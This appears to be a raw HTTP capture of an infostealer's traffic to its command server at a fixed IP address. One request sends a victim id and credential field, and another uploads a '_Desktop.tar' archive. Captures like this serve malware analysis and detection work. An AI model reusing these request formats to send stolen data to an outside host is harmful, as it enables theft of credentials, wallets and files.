POST /8vcWxwwx3/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.151
Content-Length: 21
Cache-Control: no-cache

id=795348421152&cred=

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 11 Jan 2023 22:18:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php

0

POST /8vcWxwwx3/index.php?wal=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----NzY4MA==
Host: 62.204.41.151
Content-Length: 7840
Cache-Control: no-cache

------NzY4MA==
Content-Disposition: form-data; name="data"; filename="795348421152_Desktop.tar"
Content-Type: application/octet-stream
------NzY4MA==--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 11 Jan 2023 22:18:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

0